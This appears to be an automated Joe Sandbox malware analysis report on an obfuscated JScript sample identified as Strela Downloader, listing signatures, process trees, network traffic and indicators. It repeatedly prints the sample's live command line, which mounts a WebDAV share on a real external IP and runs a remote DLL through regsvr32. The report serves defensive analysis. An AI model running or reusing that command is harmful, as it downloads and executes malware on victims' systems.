Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2971435162666519472.js

Overview

General Information

Sample name:2971435162666519472.js
Analysis ID:1577454
MD5:d5cc72873b9b26833ee92e4c831c4eda
SHA1:15f9ae15690a8673bd299294064f5e7af5992750
SHA256:40fd4d27c0a600234b65d2379776c94c8ede1f3e18fe01eb57f06f7913dd1dd9
Tags:jsuser-lowmal3
Infos:

Detection

Strela Downloader
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Yara detected Strela Downloader
Gathers information about network shares
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 984 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2971435162666519472.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 3808 cmdline: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\222642736821410.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5508 cmdline: cmd /c net use \\193.143.1.231@8888\davwwwroot\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • net.exe (PID: 3876 cmdline: net use \\193.143.1.231@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: wscript.exe PID: 984JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi64_984.amsi.csvJoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2971435162666519472.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2971435162666519472.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2971435162666519472.js", ProcessId: 984, ProcessName: wscript.exe
      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 193.143.1.231, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 3876, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): Data: Command: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\222642736821410.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\222642736821410.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2971435162666519472.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 984, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\222642736821410.dll, ProcessId: 3808, ProcessName: cmd.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2971435162666519472.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2971435162666519472.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2971435162666519472.js", ProcessId: 984, ProcessName: wscript.exe
      Source: Process startedAuthor: frack113: Data: Command: net use \\193.143.1.231@8888\davwwwroot\, CommandLine: net use \\193.143.1.231@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.231@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5508, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.231@8888\davwwwroot\, ProcessId: 3876, ProcessName: net.exe
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use \\193.143.1.231@8888\davwwwroot\, CommandLine: net use \\193.143.1.231@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.231@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5508, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.231@8888\davwwwroot\, ProcessId: 3876, ProcessName: net.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Networking

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49704
      Source: global trafficTCP traffic: 192.168.2.5:49704 -> 193.143.1.231:8888
      Source: Joe Sandbox ViewASN Name: BITWEB-ASRU BITWEB-ASRU
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: net.exe, 00000005.00000002.2109932013.000002BA8DFDB000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2109932013.000002BA8DFFC000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2109932013.000002BA8DFAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/
      Source: net.exe, 00000005.00000002.2109932013.000002BA8DFDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/)
      Source: net.exe, 00000005.00000002.2109932013.000002BA8DFDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/1
      Source: net.exe, 00000005.00000002.2109932013.000002BA8DFDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/E
      Source: net.exe, 00000005.00000002.2109932013.000002BA8DFDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/M
      Source: net.exe, 00000005.00000002.2109932013.000002BA8DFAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/s

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Source: Yara matchFile source: amsi64_984.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 984, type: MEMORYSTR

      System Summary

      barindex
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: 2971435162666519472.jsInitial sample: Strings found which are bigger than 50
      Source: classification engineClassification label: mal72.rans.troj.spyw.evad.winJS@8/0@0/1
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4160:120:WilError_03
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2971435162666519472.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\222642736821410.dll
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\222642736821410.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Run("cmd /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s", "0", "false")

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49704
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\net.exe TID: 7108Thread sleep time: -30000s >= -30000sJump to behavior
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: net.exe, 00000005.00000002.2109932013.000002BA8E009000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2109932013.000002BA8DFAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\222642736821410.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\222642736821410.dll
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\222642736821410.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information12
      Scripting
      Valid AccountsWindows Management Instrumentation12
      Scripting
      11
      Process Injection
      1
      Virtualization/Sandbox Evasion
      OS Credential Dumping1
      Network Share Discovery
      Remote ServicesData from Local System11
      Non-Standard Port
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      DLL Side-Loading
      11
      Process Injection
      LSASS Memory1
      Security Software Discovery
      Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      DLL Side-Loading
      Security Account Manager1
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information
      NTDS1
      File and Directory Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
      System Information Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://193.143.1.231:8888/)0%Avira URL Cloudsafe
      http://193.143.1.231:8888/E0%Avira URL Cloudsafe
      http://193.143.1.231:8888/10%Avira URL Cloudsafe
      http://193.143.1.231:8888/s0%Avira URL Cloudsafe
      http://193.143.1.231:8888/0%Avira URL Cloudsafe
      http://193.143.1.231:8888/M0%Avira URL Cloudsafe
      No contacted domains info
      NameSourceMaliciousAntivirus DetectionReputation
      http://193.143.1.231:8888/)net.exe, 00000005.00000002.2109932013.000002BA8DFDB000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://193.143.1.231:8888/Enet.exe, 00000005.00000002.2109932013.000002BA8DFDB000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://193.143.1.231:8888/1net.exe, 00000005.00000002.2109932013.000002BA8DFDB000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://193.143.1.231:8888/net.exe, 00000005.00000002.2109932013.000002BA8DFDB000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2109932013.000002BA8DFFC000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2109932013.000002BA8DFAC000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://193.143.1.231:8888/snet.exe, 00000005.00000002.2109932013.000002BA8DFAC000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://193.143.1.231:8888/Mnet.exe, 00000005.00000002.2109932013.000002BA8DFDB000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      193.143.1.231
      unknownunknown
      57271BITWEB-ASRUtrue
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1577454
      Start date and time:2024-12-18 13:41:31 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 2m 4s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:6
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • GSI enabled (Javascript)
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:2971435162666519472.js
      Detection:MAL
      Classification:mal72.rans.troj.spyw.evad.winJS@8/0@0/1
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .js
      • Stop behavior analysis, all processes terminated
      • Exclude process from analysis (whitelisted): dllhost.exe
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • VT rate limit hit for: 2971435162666519472.js
      TimeTypeDescription
      07:42:28API Interceptor1x Sleep call for process: net.exe modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      193.143.1.231126484723232027823.jsGet hashmaliciousStrela Downloader, Strela StealerBrowse
      • 193.143.1.231:8888/140341625623863.dll
      126484723232027823.jsGet hashmaliciousStrela Downloader, Strela StealerBrowse
      • 193.143.1.231:8888/140341625623863.dll
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      BITWEB-ASRU126484723232027823.jsGet hashmaliciousStrela Downloader, Strela StealerBrowse
      • 193.143.1.231
      126484723232027823.jsGet hashmaliciousStrela Downloader, Strela StealerBrowse
      • 193.143.1.231
      new.batGet hashmaliciousUnknownBrowse
      • 193.143.1.46
      qL619hzCfc.batGet hashmaliciousUnknownBrowse
      • 193.143.1.46
      new.batGet hashmaliciousUnknownBrowse
      • 193.143.1.46
      https://cgd-assinar.comGet hashmaliciousUnknownBrowse
      • 193.143.1.14
      11iEly4m6C.batGet hashmaliciousUnknownBrowse
      • 193.143.1.46
      YnViC5yHLu.batGet hashmaliciousUnknownBrowse
      • 193.143.1.46
      new.batGet hashmaliciousUnknownBrowse
      • 193.143.1.46
      https://cmd-autenticacaogov.com/Get hashmaliciousUnknownBrowse
      • 193.143.1.14
      No context
      No context
      No created / dropped files found
      File type:ASCII text, with very long lines (13029), with no line terminators
      Entropy (8bit):4.830378830920875
      TrID:
        File name:2971435162666519472.js
        File size:13'029 bytes
        MD5:d5cc72873b9b26833ee92e4c831c4eda
        SHA1:15f9ae15690a8673bd299294064f5e7af5992750
        SHA256:40fd4d27c0a600234b65d2379776c94c8ede1f3e18fe01eb57f06f7913dd1dd9
        SHA512:78a8c1571960081becea275ce1687970bf5c988ccd79f06017286697b5a2e8d3b75b4c151723049bf1818706dbbe57b6ef56c03bfaf953d2565a9272f453adf5
        SSDEEP:384:EXx91qXAZZ2ZZcQHK6btZY1b4lQHK6bt1XIE5Xf:bE5Xf
        TLSH:4E42EE88AA26DB7E47E8C3AE556F380254F48F6C1D70C77AC57FE54700B1BE588E9260
        File Content Preview:function vjcuinvfp(){this[rbktsrbhk+fnucaons+qozwbvlw+vwgmjzlo](iwedatboe+ygzoksh+bdtedewrq+zbgfuja+hbmpxagw+gsmbtvq+lchfe+iwedatboe+smxtnv+kjisgyz+smxtnv+edsnt+odjkdymh+fnucaons+qjgmfvcu+lpjlp+qwdhxlhsg+qwdhxlhsg+nupmhi+edsnt+vwgmjzlo+zxfxct+sbszjfzf+win
        Icon Hash:68d69b8bb6aa9a86
        TimestampSource PortDest PortSource IPDest IP
        Dec 18, 2024 13:42:27.654928923 CET497048888192.168.2.5193.143.1.231
        Dec 18, 2024 13:42:27.775741100 CET888849704193.143.1.231192.168.2.5
        Dec 18, 2024 13:42:27.775897980 CET497048888192.168.2.5193.143.1.231
        Dec 18, 2024 13:42:27.776129007 CET497048888192.168.2.5193.143.1.231
        Dec 18, 2024 13:42:27.897346020 CET888849704193.143.1.231192.168.2.5
        Dec 18, 2024 13:42:29.271722078 CET888849704193.143.1.231192.168.2.5
        Dec 18, 2024 13:42:29.312638998 CET497048888192.168.2.5193.143.1.231
        Dec 18, 2024 13:42:29.317867041 CET497048888192.168.2.5193.143.1.231
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.549704193.143.1.23188883876C:\Windows\System32\net.exe
        TimestampBytes transferredDirectionData
        Dec 18, 2024 13:42:27.776129007 CET107OUTOPTIONS / HTTP/1.1
        Connection: Keep-Alive
        User-Agent: DavClnt
        translate: f
        Host: 193.143.1.231:8888
        Dec 18, 2024 13:42:29.271722078 CET237INHTTP/1.1 500 Internal Server Error
        Server: nginx/1.22.1
        Date: Wed, 18 Dec 2024 12:42:29 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 22
        Connection: keep-alive
        X-Content-Type-Options: nosniff
        Data Raw: 49 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 0a
        Data Ascii: Internal server error


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:07:42:25
        Start date:18/12/2024
        Path:C:\Windows\System32\wscript.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2971435162666519472.js"
        Imagebase:0x7ff63bc30000
        File size:170'496 bytes
        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:2
        Start time:07:42:26
        Start date:18/12/2024
        Path:C:\Windows\System32\cmd.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\222642736821410.dll
        Imagebase:0x7ff791dd0000
        File size:289'792 bytes
        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:3
        Start time:07:42:26
        Start date:18/12/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff6d64d0000
        File size:862'208 bytes
        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:4
        Start time:07:42:26
        Start date:18/12/2024
        Path:C:\Windows\System32\cmd.exe
        Wow64 process (32bit):false
        Commandline:cmd /c net use \\193.143.1.231@8888\davwwwroot\
        Imagebase:0x7ff791dd0000
        File size:289'792 bytes
        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:5
        Start time:07:42:26
        Start date:18/12/2024
        Path:C:\Windows\System32\net.exe
        Wow64 process (32bit):false
        Commandline:net use \\193.143.1.231@8888\davwwwroot\
        Imagebase:0x7ff679eb0000
        File size:59'904 bytes
        MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Call Graph

